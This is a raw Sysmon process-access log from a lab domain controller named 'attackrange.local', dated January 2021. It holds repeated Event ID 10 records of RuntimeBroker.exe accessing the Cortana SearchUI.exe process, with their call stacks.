13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
